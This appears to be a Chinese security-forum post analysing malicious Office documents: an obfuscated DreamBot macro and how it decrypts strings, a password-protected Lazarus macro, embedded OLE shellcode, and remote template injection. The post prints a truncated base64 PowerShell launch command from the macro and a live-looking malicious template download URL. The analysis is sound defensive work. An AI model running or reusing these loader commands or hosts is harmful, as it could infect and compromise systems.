其他
恶意代码分析中一些常见的非PE样本分析
看雪论坛作者ID:顾何
先来看看OpenXML格式,正常情况下说该格式的office文档可以当成一个压缩包解压,以一个word文档为例子,压缩包内容一般如下:
[Content_Types].xml
该文件会包含包中素有的部件的内容类型和列表。
docProps文件夹
主要是有两个文件:
rels文件夹
.rels通常是描述文件结构中的起始关系,也就是说该文件用于定义其他部分与包外资源间的关系。也被叫做关系部件。
word文件夹
二进制区别
office混淆宏
这里是找到了一个DreamBot僵尸网络的样本:
912a487711217f214746a3e677e2bf32
开启宏之后:
oledump下载地址:https://www.52pojie.cn/thread-921868-1-1.html
使用方法:
首先可以直接通过oledump.py 目标文档.doc 分析出所有的代码段。
然后写一下自己调试带混淆宏的思路。
RlHKDeQP的值从1到传进来参数的长度,每次自增2。
然后RlHKDeQP会作为Mid函数的参数对传递进来的值进行分割。
FUduorb = Mid$(BlWMlTlXnkR, RlHKDeQP, 2)
然后对Fuduorb进行处理:
AIHfEQdyA = AIHfEQdyA & Chr(Val("&H" & FUduorb))
最后得到AIHfEQdyA的值:"dxiMMtu"
所以这个gzPB函数的功能就是对传递进来的参数进行解密。
OWlEmUVvwQl->hMkbDVHtbVDDttEFUWEw->dTkPsYjiXXQJXW->DqfHVjrOSVaMrAFy->MsgsyIxLElHPXcNOFMo->UoOLrJw->JFJdZo->VtrbNDgItpnfKpgAqPml->ybCDhfHLopdFPWTjmLZoUbw->FzjyS->RVThCUH->IFSeOhWOWEpX->azriOHXmFqMfPRlfDlP->LSxrp->CADXqENsQRQthfrBXvpswgqkC->lDqTvcg->MOvSslUFTPZuhCliOUXc->oVBCPDmxRv->BnqSmevUUSPyaWQ->jJPulneBpTF
lpZlNxkkO.Document.Application.ShellExecute powershell.exe -enco JAB4AG4AcQBnAHcAcQB6AG0AeABhAHUAcAA9ACIAbQB6AHIAbgBlAHoAIgA7AAoAJAB0AHMAaQBkAHMAdQAgAD0AIAAiAEkAaQBSAFAAcgB3AFYARgAiADsACgAkAGgAZQBlAHkAZQBlAHAAeQB1AGUAPQAiAGgAcwBpAGsAcgBrAGgAdwBiAHkAbwBrAGoAcwBlACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGEAYQBpAHIAZwB0AHcAaABuA
office密码宏
以之前分析过的一个样本Lazarus_6850189bbf5191a76761ab20f7c630e举例。
打开样本宏窗口:
首先选择文件路径,然后直接删除VBA密码就可以了。
ole对象
打开文件之后内容如下:
解压该文档,然后在:0D38ADC0B048BAB3BD91861D42CD39DF_w32time\xl\embeddings路径发现了ole:
可以看到在Offset00001000的地方貌似有shellcode。
关于这个Msbuild的分析以及该样本的完整分析之后写在其他文档里。
模板注入
可以看到有一个正在下载:https://www.sd1-bin.net/images/2B717e98/-1/12...的操作
这应该算是比较典型的模板注入了。
https://www.sd1-bin.net/images/2B717E98/-1/12571/4c7947ec/main.file.rtf
重新打开该rtf文件提示如下:
然后powershell的分析就调试就可以了...
看雪ID:顾何
https://bbs.pediy.com/user-757351.htm
推荐文章++++